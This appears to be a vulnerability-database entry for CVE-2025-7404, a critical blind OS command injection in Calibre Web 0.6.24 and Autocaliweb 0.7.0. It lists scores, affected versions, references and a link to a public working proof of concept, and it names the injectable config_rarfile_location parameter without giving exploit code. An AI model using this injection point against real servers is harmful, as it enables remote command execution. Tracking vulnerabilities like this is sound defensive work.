CVE-2025-7404

CRITICAL

Calibre Web 0.6.24 and Autocaliweb 0.7.0 - Blind OS Command Injection

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-7404. PoCs published by mind2hex.

AI-analyzed exploit summary This repository contains a functional exploit for CVE-2025-7404, a blind command injection vulnerability in CalibreWeb 0.6.24. The exploit leverages the `config_rarfile_location` parameter to execute arbitrary commands on the target system.

Description

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Calibre Web, Autocaliweb allows Blind OS Command Injection.This issue affects Calibre Web: 0.6.24 (Nicolette); Autocaliweb: from 0.7.0 before 0.7.1.

Exploits (1)

nomisec WORKING POC
by mind2hex · poc
https://github.com/mind2hex/CVE-2025-7404-CalibreWeb-0.6.24-BlindCommandInjection

This repository contains a functional exploit for CVE-2025-7404, a blind command injection vulnerability in CalibreWeb 0.6.24. The exploit leverages the `config_rarfile_location` parameter to execute arbitrary commands on the target system.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: CalibreWeb 0.6.24
Auth required
Prerequisites: Admin credentials for CalibreWeb · Network access to the target
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (3)

Core 3
Core References
Exploit, Third Party Advisory third-party-advisory
https://fluidattacks.com/advisories/kino

Scores

CVSS v3 9.8
EPSS 0.0233
EPSS Percentile 85.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation poc
Automatable no
Technical Impact partial

Details

CWE
CWE-78
Status published
Products (3)
gelbphoenix/autocaliweb 0.7.0
janeczku/calibre-web 0.6.24
pypi/calibreweb 0PyPI
Published Jul 24, 2025
Tracked Since Feb 18, 2026